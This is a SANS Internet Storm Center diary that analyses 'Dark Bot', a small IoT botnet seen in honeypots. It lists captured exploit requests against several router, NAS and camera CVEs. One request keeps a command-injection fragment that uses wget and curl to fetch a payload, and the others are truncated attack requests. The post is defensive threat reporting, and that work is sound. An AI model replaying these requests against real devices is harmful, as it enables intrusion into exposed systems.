Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Boutique "Dark" Botnet Hunting for Crumbs - SANS Internet Storm Center SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Boutique "Dark" Botnet Hunting for Crumbs
Image Credit:

As I have said before, Internet of Things (IoT) devices are best compared to Mosquitos. Individually, they are annoying. But their large number makes them the most deadly animal around [1]. Many botnets like Mirai or Mozi are going after simple exploits affecting large numbers of devices. These mosquito hunters are like birds in the sense that they live from large numbers of vulnerable devices. The botnets themselves are usually mostly an annoyance unless you get hit by a DoS attack (ever parked your car under a tree with nesting birds?).


But aside from these more visible botnets, there are smaller, "Boutique" botnets. They go after less common vulnerabilities and pick systems that the major botnets find not lucrative enough to go after. Usually, only a few vulnerable devices are exposed. Taking the animal analogy a bit too far: These are like crustaceans on the ocean floor living off what the predators above discard.

One such botnet is "Dark Bot." It mostly scans for a few vulnerabilities, and the botnet itself isn't really all that big. For about 10,000 IPs hitting our honeypots, we may see 3 or 4 "Dark Bots." As far as we are concerned, "Dark Bot" is identified by the User-Agent "Dark" (pretty straightforward).

Dark Bot is interesting as it does pick recent vulnerabilities (only one vulnerability below is not from 2021, and I may have misidentified the exact vulnerability here). It likes simple command injection vulnerabilities and uses them to download and execute a script called "". The script will typically follow the playbook of other worms like Mirai and Mozi in downloading the same binary compiled for different architectures to see what sticks.

So what should you do against this type of botnet? Absolutely nothing. None of these devices should ever be exposed to the "outside." Sure, patching is a bit tricky, but without exposure, these vulnerabilities should not be much of an issue as far as this botnet goes. It scans, infects, and moves on. Radware recently published a few details about this botnet as well [2]. 

Here are some of the requests we see from this botnet currently:

RealTek SDK (CVE-2021-35395)

POST /goform/formWsc HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Dark

Seagate Blackarmor NAS (CVE-2014-3206)

GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+;curl+-O+;
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Dark

Buffalo WSR-2533DHPL2 firmware  Vulnerability (CVE-2021-20090)

This is a simple to exploit command injection vulnerability. Other routers may be affected, as well as they may share the same vulnerable firmware.

POST /images/..%2fapply_abstract.cgi
Connection: close
User-Agent: Dark

RealTek SDK (CVE-2021-35395)

This vulnerability affects various IoT devices using the affected RealTek SDK. Again a simple command injection vulnerability not requiring any authentication.

POST /goform/formSysCmd HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Dark

Geutebrück G-Cam E2 and G-Code (multiple possible 2021 CVEs)

POST //uapi-cgi/certmngr.cgi HTTP/1.1
User-Agent: Dark





Johannes B. Ullrich, Ph.D. , Dean of Research,

I will be teaching next: Application Security: Securing Web Apps, APIs, and Microservices - SANSFIRE 2022


4504 Posts
ISC Handler
Oct 4th 2021

Sign Up for Free or Log In to start participating in the conversation!